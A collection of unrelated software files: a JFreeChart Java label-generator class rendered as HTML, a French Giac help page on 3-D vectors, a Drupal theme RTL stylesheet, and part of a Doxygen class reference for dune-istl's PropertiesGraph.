class="sourceLineNo">043</span>import java.io.Serializable;<a name="line.43"></a> <span class="sourceLineNo">044</span>import java.text.DateFormat;<a name="line.44"></a> <span class="sourceLineNo">045</span>import java.text.MessageFormat;<a name="line.45"></a> <span class="sourceLineNo">046</span>import java.text.NumberFormat;<a name="line.46"></a> <span class="sourceLineNo">047</span>import java.util.Date;<a name="line.47"></a> <span class="sourceLineNo">048</span><a name="line.48"></a> <span class="sourceLineNo">049</span>import org.jfree.data.xy.IntervalXYDataset;<a name="line.49"></a> <span class="sourceLineNo">050</span>import org.jfree.data.xy.XYDataset;<a name="line.50"></a> <span class="sourceLineNo">051</span>import org.jfree.util.PublicCloneable;<a name="line.51"></a> <span class="sourceLineNo">052</span><a name="line.52"></a> <span class="sourceLineNo">053</span>/**<a name="line.53"></a> <span class="sourceLineNo">054</span> * An item label generator for datasets that implement the<a name="line.54"></a> <span class="sourceLineNo">055</span> * {@link IntervalXYDataset} interface.<a name="line.55"></a> <span class="sourceLineNo">056</span> *<a name="line.56"></a> <span class="sourceLineNo">057</span> * @since 1.0.10<a name="line.57"></a> <span class="sourceLineNo">058</span> */<a name="line.58"></a> <span class="sourceLineNo">059</span>public class IntervalXYItemLabelGenerator extends AbstractXYItemLabelGenerator<a name="line.59"></a> <span class="sourceLineNo">060</span> implements XYItemLabelGenerator, Cloneable, PublicCloneable,<a name="line.60"></a> <span class="sourceLineNo">061</span> Serializable {<a name="line.61"></a> <span class="sourceLineNo">062</span><a name="line.62"></a> <span class="sourceLineNo">063</span> /** The default item label format. */<a name="line.63"></a> <span class="sourceLineNo">064</span> public static final String DEFAULT_ITEM_LABEL_FORMAT = "{5} - {6}";<a name="line.64"></a> <span class="sourceLineNo">065</span><a name="line.65"></a> <span class="sourceLineNo">066</span> /**<a name="line.66"></a> <span class="sourceLineNo">067</span> * Creates an item label generator using default number formatters.<a name="line.67"></a> <span class="sourceLineNo">068</span> */<a name="line.68"></a> <span class="sourceLineNo">069</span> public IntervalXYItemLabelGenerator() {<a name="line.69"></a> <span class="sourceLineNo">070</span> this(DEFAULT_ITEM_LABEL_FORMAT, NumberFormat.getNumberInstance(),<a name="line.70"></a> <span class="sourceLineNo">071</span> NumberFormat.getNumberInstance());<a name="line.71"></a> <span class="sourceLineNo">072</span> }<a name="line.72"></a> <span class="sourceLineNo">073</span><a name="line.73"></a> <span class="sourceLineNo">074</span> /**<a name="line.74"></a> <span class="sourceLineNo">075</span> * Creates an item label generator using the specified number formatters.<a name="line.75"></a> <span class="sourceLineNo">076</span> *<a name="line.76"></a> <span class="sourceLineNo">077</span> * @param formatString the item label format string (&lt;code&gt;null&lt;/code&gt; not<a name="line.77"></a> <span class="sourceLineNo">078</span> * permitted).<a name="line.78"></a> <span class="sourceLineNo">079</span> * @param xFormat the format object for the x values (&lt;code&gt;null&lt;/code&gt;<a name="line.79"></a> <span class="sourceLineNo">080</span> * not permitted).<a name="line.80"></a> <span class="sourceLineNo">081</span> * @param yFormat the format object for the y values (&lt;code&gt;null&lt;/code&gt;<a name="line.81"></a> <span class="sourceLineNo">082</span> * not permitted).<a name="line.82"></a> <span class="sourceLineNo">083</span> */<a name="line.83"></a> <span class="sourceLineNo">084</span> public IntervalXYItemLabelGenerator(String formatString,<a name="line.84"></a> <span class="sourceLineNo">085</span> NumberFormat xFormat, NumberFormat yFormat) {<a name="line.85"></a> <span class="sourceLineNo">086</span><a name="line.86"></a> <span class="sourceLineNo">087</span> super(formatString, xFormat, yFormat);<a name="line.87"></a> <span class="sourceLineNo">088</span> }<a name="line.88"></a> <span class="sourceLineNo">089</span><a name="line.89"></a> <span class="sourceLineNo">090</span> /**<a name="line.90"></a> <span class="sourceLineNo">091</span> * Creates an item label generator using the specified formatters.<a name="line.91"></a> <span class="sourceLineNo">092</span> *<a name="line.92"></a> <span class="sourceLineNo">093</span> * @param formatString the item label format string (&lt;code&gt;null&lt;/code&gt;<a name="line.93"></a> <span class="sourceLineNo">094</span> * not permitted).<a name="line.94"></a> <span class="sourceLineNo">095</span> * @param xFormat the format object for the x values (&lt;code&gt;null&lt;/code&gt;<a name="line.95"></a> <span class="sourceLineNo">096</span> * not permitted).<a name="line.96"></a> <span class="sourceLineNo">097</span> * @param yFormat the format object for the y values (&lt;code&gt;null&lt;/code&gt;<a name="line.97"></a> <span class="sourceLineNo">098</span> * not permitted).<a name="line.98"></a> <span class="sourceLineNo">099</span> */<a name="line.99"></a> <span class="sourceLineNo">100</span> public IntervalXYItemLabelGenerator(String formatString,<a name="line.100"></a> <span class="sourceLineNo">101</span> DateFormat xFormat, NumberFormat yFormat) {<a name="line.101"></a> <span class="sourceLineNo">102</span><a name="line.102"></a> <span class="sourceLineNo">103</span> super(formatString, xFormat, yFormat);<a name="line.103"></a> <span class="sourceLineNo">104</span> }<a name="line.104"></a> <span class="sourceLineNo">105</span><a name="line.105"></a> <span class="sourceLineNo">106</span> /**<a name="line.106"></a> <span class="sourceLineNo">107</span> * Creates an item label generator using the specified formatters (a<a name="line.107"></a> <span class="sourceLineNo">108</span> * number formatter for the x-values and a date formatter for the<a name="line.108"></a> <span class="sourceLineNo">109</span> * y-values).<a name="line.109"></a> <span class="sourceLineNo">110</span> *<a name="line.110"></a> <span class="sourceLineNo">111</span> * @param formatString the item label format string (&lt;code&gt;null&lt;/code&gt;<a name="line.111"></a> <span class="sourceLineNo">112</span> * not permitted).<a name="line.112"></a> <span class="sourceLineNo">113</span> * @param xFormat the format object for the x values (&lt;code&gt;null&lt;/code&gt;<a name="line.113"></a> <span class="sourceLineNo">114</span> * permitted).<a name="line.114"></a> <span class="sourceLineNo">115</span> * @param yFormat the format object for the y values (&lt;code&gt;null&lt;/code&gt;<a name="line.115"></a> <span class="sourceLineNo">116</span> * not permitted).<a name="line.116"></a> <span class="sourceLineNo">117</span> */<a name="line.117"></a> <span class="sourceLineNo">118</span> public IntervalXYItemLabelGenerator(String formatString,<a name="line.118"></a> <span class="sourceLineNo">119</span> NumberFormat xFormat, DateFormat yFormat) {<a name="line.119"></a> <span class="sourceLineNo">120</span><a name="line.120"></a> <span class="sourceLineNo">121</span> super(formatString, xFormat, yFormat);<a name="line.121"></a> <span class="sourceLineNo">122</span> }<a name="line.122"></a> <span class="sourceLineNo">123</span><a name="line.123"></a> <span class="sourceLineNo">124</span> /**<a name="line.124"></a> <span class="sourceLineNo">125</span> * Creates a label generator using the specified date formatters.<a name="line.125"></a> <span class="sourceLineNo">126</span> *<a name="line.126"></a> <span class="sourceLineNo">127</span> * @param formatString the label format string (&lt;code&gt;null&lt;/code&gt; not<a name="line.127"></a> <span class="sourceLineNo">128</span> * permitted).<a name="line.128"></a> <span class="sourceLineNo">129</span> * @param xFormat the format object for the x values (&lt;code&gt;null&lt;/code&gt;<a name="line.129"></a> <span class="sourceLineNo">130</span> * not permitted).<a name="line.130"></a> <span class="sourceLineNo">131</span> * @param yFormat the format object for the y values (&lt;code&gt;null&lt;/code&gt;<a name="line.131"></a> <span class="sourceLineNo">132</span> * not permitted).<a name="line.132"></a> <span class="sourceLineNo">133</span> */<a name="line.133"></a> <span class="sourceLineNo">134</span> public IntervalXYItemLabelGenerator(String formatString,<a name="line.134"></a> <span class="sourceLineNo">135</span> DateFormat xFormat, DateFormat yFormat) {<a name="line.135"></a> <span class="sourceLineNo">136</span><a name="line.136"></a> <span class="sourceLineNo">137</span> super(formatString, xFormat, yFormat);<a name="line.137"></a> <span class="sourceLineNo">138</span> }<a name="line.138"></a> <span class="sourceLineNo">139</span><a name="line.139"></a> <span class="sourceLineNo">140</span> /**<a name="line.140"></a> <span class="sourceLineNo">141</span> * Creates the array of items that can be passed to the<a name="line.141"></a> <span class="sourceLineNo">142</span> * {@link MessageFormat} class for creating labels.<a name="line.142"></a> <span class="sourceLineNo">143</span> *<a name="line.143"></a> <span class="sourceLineNo">144</span> * @param dataset the dataset (&lt;code&gt;null&lt;/code&gt; not permitted).<a name="line.144"></a> <span class="sourceLineNo">145</span> * @param series the series (zero-based index).<a name="line.145"></a> <span class="sourceLineNo">146</span> * @param item the item (zero-based index).<a name="line.146"></a> <span class="sourceLineNo">147</span> *<a name="line.147"></a> <span class="sourceLineNo">148</span> * @return An array of seven items from the dataset formatted as<a name="line.148"></a> <span class="sourceLineNo">149</span> * &lt;code&gt;String&lt;/code&gt; objects (never &lt;code&gt;null&lt;/code&gt;).<a name="line.149"></a> <span class="sourceLineNo">150</span> */<a name="line.150"></a> <span class="sourceLineNo">151</span> protected Object[] createItemArray(XYDataset dataset, int series,<a name="line.151"></a> <span class="sourceLineNo">152</span> int item) {<a name="line.152"></a> <span class="sourceLineNo">153</span><a name="line.153"></a> <span class="sourceLineNo">154</span> IntervalXYDataset intervalDataset = null;<a name="line.154"></a> <span class="sourceLineNo">155</span> if (dataset instanceof IntervalXYDataset) {<a name="line.155"></a> <span class="sourceLineNo">156</span> intervalDataset = (IntervalXYDataset) dataset;<a name="line.156"></a> <span class="sourceLineNo">157</span> }<a name="line.157"></a> <span class="sourceLineNo">158</span> Object[] result = new Object[7];<a name="line.158"></a> <span class="sourceLineNo">159</span> result[0] = dataset.getSeriesKey(series).toString();<a name="line.159"></a> <span class="sourceLineNo">160</span><a name="line.160"></a> <span class="sourceLineNo">161</span> double x = dataset.getXValue(series, item);<a name="line.161"></a> <span class="sourceLineNo">162</span> double xs = x;<a name="line.162"></a> <span class="sourceLineNo">163</span> double xe = x;<a name="line.163"></a> <span class="sourceLineNo">164</span> double y = dataset.getYValue(series, item);<a name="line.164"></a> <span class="sourceLineNo">165</span> double ys = y;<a name="line.165"></a> <span class="sourceLineNo">166</span> double ye = y;<a name="line.166"></a> <span class="sourceLineNo">167</span> if (intervalDataset != null) {<a name="line.167"></a> <span class="sourceLineNo">168</span> xs = intervalDataset.getStartXValue(series, item);<a name="line.168"></a> <span class="sourceLineNo">169</span> xe = intervalDataset.getEndXValue(series, item);<a name="line.169"></a> <span class="sourceLineNo">170</span> ys = intervalDataset.getStartYValue(series, item);<a name="line.170"></a> <span class="sourceLineNo">171</span> ye = intervalDataset.getEndYValue(series, item);<a name="line.171"></a> <span class="sourceLineNo">172</span> }<a name="line.172"></a> <span class="sourceLineNo">173</span><a name="line.173"></a> <span class="sourceLineNo">174</span> DateFormat xdf = getXDateFormat();<a name="line.174"></a> <span class="sourceLineNo">175</span> if (xdf != null) {<a name="line.175"></a> <span class="sourceLineNo">176</span> result[1] = xdf.format(new Date((long) x));<a name="line.176"></a> <span class="sourceLineNo">177</span> result[2] = xdf.format(new Date((long) xs));<a name="line.177"></a> <span class="sourceLineNo">178</span> result[3] = xdf.format(new Date((long) xe));<a name="line.178"></a> <span class="sourceLineNo">179</span> }<a name="line.179"></a> <span class="sourceLineNo">180</span> else {<a name="line.180"></a> <span class="sourceLineNo">181</span> NumberFormat xnf = getXFormat();<a name="line.181"></a> <span class="sourceLineNo">182</span> result[1] = xnf.format(x);<a name="line.182"></a> <span class="sourceLineNo">183</span> result[2] = xnf.format(xs);<a name="line.183"></a> <span class="sourceLineNo">184</span> result[3] = xnf.format(xe);<a name="line.184"></a> <span class="sourceLineNo">185</span> }<a name="line.185"></a> <span class="sourceLineNo">186</span><a name="line.186"></a> <span class="sourceLineNo">187</span> NumberFormat ynf = getYFormat();<a name="line.187"></a> <span class="sourceLineNo">188</span> DateFormat ydf = getYDateFormat();<a name="line.188"></a> <span class="sourceLineNo">189</span> if (Double.isNaN(y) &amp;&amp; dataset.getY(series, item) == null) {<a name="line.189"></a> <span class="sourceLineNo">190</span> result[4] = getNullYString();<a name="line.190"></a> <span class="sourceLineNo">191</span> }<a name="line.191"></a> <span class="sourceLineNo">192</span> else {<a name="line.192"></a> <span class="sourceLineNo">193</span> if (ydf != null) {<a name="line.193"></a> <span class="sourceLineNo">194</span> result[4] = ydf.format(new Date((long) y));<a name="line.194"></a> <span class="sourceLineNo">195</span> }<a name="line.195"></a> <span class="sourceLineNo">196</span> else {<a name="line.196"></a> <span class="sourceLineNo">197</span> result[4] = ynf.format(y);<a name="line.197"></a> <span class="sourceLineNo">198</span> }<a name="line.198"></a> <span class="sourceLineNo">199</span> }<a name="line.199"></a> <span class="sourceLineNo">200</span> if (Double.isNaN(ys)<a name="line.200"></a> <span class="sourceLineNo">201</span> &amp;&amp; intervalDataset.getStartY(series, item) == null) {<a name="line.201"></a> <span class="sourceLineNo">202</span> result[5] = getNullYString();<a name="line.202"></a> <span class="sourceLineNo">203</span> }<a name="line.203"></a> <span class="sourceLineNo">204</span> else {<a name="line.204"></a> <span class="sourceLineNo">205</span> if (ydf != null) {<a name="line.205"></a> <span class="sourceLineNo">206</span> result[5] = ydf.format(new Date((long) ys));<a name="line.206"></a> <span class="sourceLineNo">207</span> }<a name="line.207"></a> <span class="sourceLineNo">208</span> else {<a name="line.208"></a> <span class="sourceLineNo">209</span> result[5] = ynf.format(ys);<a name="line.209"></a> <span class="sourceLineNo">210</span> }<a name="line.210"></a> <span class="sourceLineNo">211</span> }<a name="line.211"></a> <span class="sourceLineNo">212</span> if (Double.isNaN(ye)<a name="line.212"></a> <span class="sourceLineNo">213</span> &amp;&amp; intervalDataset.getEndY(series, item) == null) {<a name="line.213"></a> <span class="sourceLineNo">214</span> result[6] = getNullYString();<a name="line.214"></a> <span class="sourceLineNo">215</span> }<a name="line.215"></a> <span class="sourceLineNo">216</span> else {<a name="line.216"></a> <span class="sourceLineNo">217</span> if (ydf != null) {<a name="line.217"></a> <span class="sourceLineNo">218</span> result[6] = ydf.format(new Date((long) ye));<a name="line.218"></a> <span class="sourceLineNo">219</span> }<a name="line.219"></a> <span class="sourceLineNo">220</span> else {<a name="line.220"></a> <span class="sourceLineNo">221</span> result[6] = ynf.format(ye);<a name="line.221"></a> <span class="sourceLineNo">222</span> }<a name="line.222"></a> <span class="sourceLineNo">223</span> }<a name="line.223"></a> <span class="sourceLineNo">224</span> return result;<a name="line.224"></a> <span class="sourceLineNo">225</span> }<a name="line.225"></a> <span class="sourceLineNo">226</span><a name="line.226"></a> <span class="sourceLineNo">227</span> /**<a name="line.227"></a> <span class="sourceLineNo">228</span> * Generates the item label text for an item in a dataset.<a name="line.228"></a> <span class="sourceLineNo">229</span> *<a name="line.229"></a> <span class="sourceLineNo">230</span> * @param dataset the dataset (&lt;code&gt;null&lt;/code&gt; not permitted).<a name="line.230"></a> <span class="sourceLineNo">231</span> * @param series the series index (zero-based).<a name="line.231"></a> <span class="sourceLineNo">232</span> * @param item the item index (zero-based).<a name="line.232"></a> <span class="sourceLineNo">233</span> *<a name="line.233"></a> <span class="sourceLineNo">234</span> * @return The label text (possibly &lt;code&gt;null&lt;/code&gt;).<a name="line.234"></a> <span class="sourceLineNo">235</span> */<a name="line.235"></a> <span class="sourceLineNo">236</span> public String generateLabel(XYDataset dataset, int series, int item) {<a name="line.236"></a> <span class="sourceLineNo">237</span> return generateLabelString(dataset, series, item);<a name="line.237"></a> <span class="sourceLineNo">238</span> }<a name="line.238"></a> <span class="sourceLineNo">239</span><a name="line.239"></a> <span class="sourceLineNo">240</span> /**<a name="line.240"></a> <span class="sourceLineNo">241</span> * Returns an independent copy of the generator.<a name="line.241"></a> <span class="sourceLineNo">242</span> *<a name="line.242"></a> <span class="sourceLineNo">243</span> * @return A clone.<a name="line.243"></a> <span class="sourceLineNo">244</span> *<a name="line.244"></a> <span class="sourceLineNo">245</span> * @throws CloneNotSupportedException if cloning is not supported.<a name="line.245"></a> <span class="sourceLineNo">246</span> */<a name="line.246"></a> <span class="sourceLineNo">247</span> public Object clone() throws CloneNotSupportedException {<a name="line.247"></a> <span class="sourceLineNo">248</span> return super.clone();<a name="line.248"></a> <span class="sourceLineNo">249</span> }<a name="line.249"></a> <span class="sourceLineNo">250</span><a name="line.250"></a> <span class="sourceLineNo">251</span> /**<a name="line.251"></a> <span class="sourceLineNo">252</span> * Tests this object for equality with an arbitrary object.<a name="line.252"></a> <span class="sourceLineNo">253</span> *<a name="line.253"></a> <span class="sourceLineNo">254</span> * @param obj the other object (&lt;code&gt;null&lt;/code&gt; permitted).<a name="line.254"></a> <span class="sourceLineNo">255</span> *<a name="line.255"></a> <span class="sourceLineNo">256</span> * @return A boolean.<a name="line.256"></a> <span class="sourceLineNo">257</span> */<a name="line.257"></a> <span class="sourceLineNo">258</span> public boolean equals(Object obj) {<a name="line.258"></a> <span class="sourceLineNo">259</span> if (obj == this) {<a name="line.259"></a> <span class="sourceLineNo">260</span> return true;<a name="line.260"></a> <span class="sourceLineNo">261</span> }<a name="line.261"></a> <span class="sourceLineNo">262</span> if (!(obj instanceof IntervalXYItemLabelGenerator)) {<a name="line.262"></a> <span class="sourceLineNo">263</span> return false;<a name="line.263"></a> <span class="sourceLineNo">264</span> }<a name="line.264"></a> <span class="sourceLineNo">265</span> return super.equals(obj);<a name="line.265"></a> <span class="sourceLineNo">266</span> }<a name="line.266"></a> <span class="sourceLineNo">267</span><a name="line.267"></a> <span class="sourceLineNo">268</span>}<a name="line.268"></a> </pre> </div> </body> </html>
giac/giac-1.2.3/doc/fr/cascmd_fr/cascmd_fr1019.html
hiplayer/giac
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <META name="GENERATOR" content="hevea 1.10"> <LINK rel="stylesheet" type="text/css" href="cascmd_fr.css"> <TITLE>Le vecteur en 3-d : vecteur</TITLE> </HEAD> <BODY > <A HREF="cascmd_fr1018.html"><IMG SRC="previous_motif.gif" ALT="Previous"></A> <A HREF="index.html"><IMG SRC="contents_motif.gif" ALT="Up"></A> <A HREF="cascmd_fr1020.html"><IMG SRC="next_motif.gif" ALT="Next"></A> <HR> <H3 CLASS="subsection"><A NAME="htoc1195">11.5.5</A>  Le vecteur en 3-d : <TT>vecteur</TT></H3><P><A NAME="@default1988"></A> <A NAME="sec:vecteur3"></A> <B>Voir aussi :</B> <A HREF="cascmd_fr910.html#sec:vecteur2">10.9.6</A> pour la géométrie plane.<BR> Pour travailler avec les composantes d’un vecteur de ℝ<SUP><I>n</I></SUP>, il faut utiliser des listes.<BR> <TT>vecteur</TT>, en géométrie 3-d, a comme arguments soit : </P><UL CLASS="itemize"><LI CLASS="li-itemize"> une liste représentant les coordonnées d’un point <I>A</I>.<BR> <TT>vecteur</TT> définit et dessine le vecteur <I>OA</I> où <I>O</I> est l’origine du repère. </LI><LI CLASS="li-itemize">deux points <I>A</I>,<I>B</I> ou deux listes représentant les coordonnées de ces points.<BR> <TT>vecteur</TT> définit et dessine le vecteur <I>AB</I> </LI><LI CLASS="li-itemize">un point <I>A</I> (ou une liste représentant les coordonnées de ce point) et un vecteur <I>V</I> (définition récursive).<BR> <TT>vecteur</TT> définit et dessine le vecteur <I>AB</I> tel que <I>AB</I>=<I>V</I>. </LI></UL><P> On tape : </P><DIV CLASS="center"><TT>vecteur([1,2,3])</TT></DIV><P> On obtient : </P><DIV CLASS="center"><TT>Le tracé du vecteur d’origine [0,0,0] et d’extrémité [1,2,3]</TT></DIV><P> On tape : </P><DIV CLASS="center"><TT>vecteur(point([-1,0,0]),point([0,1,2]))</TT></DIV><P> Ou on tape : </P><DIV CLASS="center"><TT>vecteur([-1,0,0],[0,1,2])</TT></DIV><P> On obtient : </P><DIV CLASS="center"><TT>Le tracé du vecteur d’origine [-1,0,0] et d’extrémité [0,1,2]</TT></DIV><P> On tape : </P><DIV CLASS="center"><TT>V:=vecteur([-1,0,0],[0,1,2])</TT></DIV><P> On tape : </P><DIV CLASS="center"><TT>vecteur(point([-1,2,0]),V)</TT></DIV><P> Ou on tape : </P><DIV CLASS="center"><TT>vecteur([-1,2,0],V)</TT></DIV><P> On obtient : </P><DIV CLASS="center"><TT>Le tracé du vecteur d’origine [-1,2,0] et d’extrémité [0,3,2]</TT></DIV><P> <B>Remarque</B><BR> En calcul formel, on travaille sur la liste des coordonnées des vecteurs que l’on obtient avec la commande <TT>coordonnees</TT> (cf <A HREF="cascmd_fr1048.html#sec:coordonnees3">11.12.4</A>).</P><HR> <A HREF="cascmd_fr1018.html"><IMG SRC="previous_motif.gif" ALT="Previous"></A> <A HREF="index.html"><IMG SRC="contents_motif.gif" ALT="Up"></A> <A HREF="cascmd_fr1020.html"><IMG SRC="next_motif.gif" ALT="Next"></A> </BODY> </HTML>
sites/all/themes/omega/omega/css/modules/system/system.menus.theme-rtl.css
DrupalChile/drupalcl
/** * @file * Right to left menu and navigational styles. */ /** * @file * Styles for a hierarchical menu as generated by theme_menu_tree(). */ @media -sass-debug-info{filename{font-family:file\:\/\/\/Applications\/mampstack-5\.4\.40-0\/apache2\/htdocs\/drupalcl\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/menus\/_menutree\.theme-rtl\.scss}line{font-family:\000036}} .menu { text-align: right; /* Menu Item Hierarchy Modifiers */ } @media -sass-debug-info{filename{font-family:file\:\/\/\/Applications\/mampstack-5\.4\.40-0\/apache2\/htdocs\/drupalcl\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/menus\/_menutree\.theme-rtl\.scss}line{font-family:\0000310}} .menu .collapsed { list-style-image: url('../../../images/misc/menu-collapsed-rtl.png?1432693563'); } /** * @file * Inline links as generated by theme_links(). */ @media -sass-debug-info{filename{font-family:file\:\/\/\/Applications\/mampstack-5\.4\.40-0\/apache2\/htdocs\/drupalcl\/sites\/all\/themes\/omega\/omega\/sass\/modules\/system\/menus\/_links\.theme-rtl\.scss}line{font-family:\000037}} ul.inline li { float: right; margin-right: 0; margin-left: 1em; }
doc/doxygen/html/a00205.html
akva2/dune-istl
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <title>dune-istl: Dune::Amg::PropertiesGraph&lt; G, VP, EP, VM, EM &gt; Class Template Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">dune-istl &#160;<span id="projectnumber">2.2.0</span> </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.1 --> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="modules.html"><span>Modules</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="classes.html"><span>Class&#160;Index</span></a></li> <li><a href="hierarchy.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="a00360.html">Dune</a></li><li class="navelem"><a class="el" href="a00366.html">Amg</a></li><li class="navelem"><a class="el" href="a00205.html">PropertiesGraph</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#nested-classes">Classes</a> &#124; <a href="#pub-types">Public Types</a> &#124; <a href="#pub-methods">Public Member Functions</a> </div> <div class="headertitle"> <div class="title">Dune::Amg::PropertiesGraph&lt; G, VP, EP, VM, EM &gt; Class Template Reference<div class="ingroups"><a class="el" href="a00372.html">Parallel Algebraic Multigrid</a></div></div> </div> </div><!--header--> <div class="contents"> <p>Attaches properties to the edges and vertices of a graph. <a href="a00205.html#details">More...</a></p> <p><code>#include &lt;<a class="el" href="a00311_source.html">dune/istl/paamg/graph.hh</a>&gt;</code></p> <p><a href="a00705.html">List of all members.</a></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2><a name="nested-classes"></a> Classes</h2></td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00113.html">EdgeIteratorT</a></td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00291.html">VertexIteratorT</a></td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2><a name="pub-types"></a> Public Types</h2></td></tr> <tr class="memitem:a6e83e9aa4e797967fa318b86459d0149"><td class="memItemLeft" align="right" valign="top">typedef G&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a></td></tr> <tr class="memdesc:a6e83e9aa4e797967fa318b86459d0149"><td class="mdescLeft">&#160;</td><td class="mdescRight">The graph we attach properties to. <a href="#a6e83e9aa4e797967fa318b86459d0149"></a><br/></td></tr> <tr class="memitem:acc1d8f22266e986a90c7ff0a380517d8"><td class="memItemLeft" align="right" valign="top">typedef Graph::VertexDescriptor&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a></td></tr> <tr class="memdesc:acc1d8f22266e986a90c7ff0a380517d8"><td class="mdescLeft">&#160;</td><td class="mdescRight">The vertex descriptor. <a href="#acc1d8f22266e986a90c7ff0a380517d8"></a><br/></td></tr> <tr class="memitem:a1e87b1382ebbf1cab6a77fc3cb3849c6"><td class="memItemLeft" align="right" valign="top">typedef Graph::EdgeDescriptor&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a></td></tr> <tr class="memdesc:a1e87b1382ebbf1cab6a77fc3cb3849c6"><td class="mdescLeft">&#160;</td><td class="mdescRight">The edge descritor. <a href="#a1e87b1382ebbf1cab6a77fc3cb3849c6"></a><br/></td></tr> <tr class="memitem:aa13e4d256759286236ec4ca19ff73e9e"><td class="memItemLeft" align="right" valign="top">typedef VP&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a></td></tr> <tr class="memdesc:aa13e4d256759286236ec4ca19ff73e9e"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the properties of the vertices. <a href="#aa13e4d256759286236ec4ca19ff73e9e"></a><br/></td></tr> <tr class="memitem:a965116a5ca037414e1c5ae6ab342b8ad"><td class="memItemLeft" align="right" valign="top">typedef VM&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a965116a5ca037414e1c5ae6ab342b8ad">VertexMap</a></td></tr> <tr class="memdesc:a965116a5ca037414e1c5ae6ab342b8ad"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the map for converting the VertexDescriptor to std::size_t. <a href="#a965116a5ca037414e1c5ae6ab342b8ad"></a><br/></td></tr> <tr class="memitem:aa8149c0a1d29a2b3c2d7fe2520aecaa2"><td class="memItemLeft" align="right" valign="top">typedef EP&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a></td></tr> <tr class="memdesc:aa8149c0a1d29a2b3c2d7fe2520aecaa2"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the properties of the edges;. <a href="#aa8149c0a1d29a2b3c2d7fe2520aecaa2"></a><br/></td></tr> <tr class="memitem:a8179cbefa851d6c0094255659e1930a9"><td class="memItemLeft" align="right" valign="top">typedef EM&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a8179cbefa851d6c0094255659e1930a9">EdgeMap</a></td></tr> <tr class="memdesc:a8179cbefa851d6c0094255659e1930a9"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the map for converting the EdgeDescriptor to std::size_t. <a href="#a8179cbefa851d6c0094255659e1930a9"></a><br/></td></tr> <tr class="memitem:a1ce0f1eaa14e3c256b2591bac899f4db"><td class="memItemLeft" align="right" valign="top">typedef <a class="el" href="a00113.html">EdgeIteratorT</a><br class="typebreak"/> &lt; <a class="el" href="a00205.html">PropertiesGraph</a>&lt; <a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>, VM, EM &gt; &gt;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a1ce0f1eaa14e3c256b2591bac899f4db">EdgeIterator</a></td></tr> <tr class="memdesc:a1ce0f1eaa14e3c256b2591bac899f4db"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the mutable edge iterator. <a href="#a1ce0f1eaa14e3c256b2591bac899f4db"></a><br/></td></tr> <tr class="memitem:a39d89142505784b2c0b19a879307b7a3"><td class="memItemLeft" align="right" valign="top">typedef <a class="el" href="a00113.html">EdgeIteratorT</a>&lt; const <br class="typebreak"/> <a class="el" href="a00205.html">PropertiesGraph</a>&lt; <a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <br 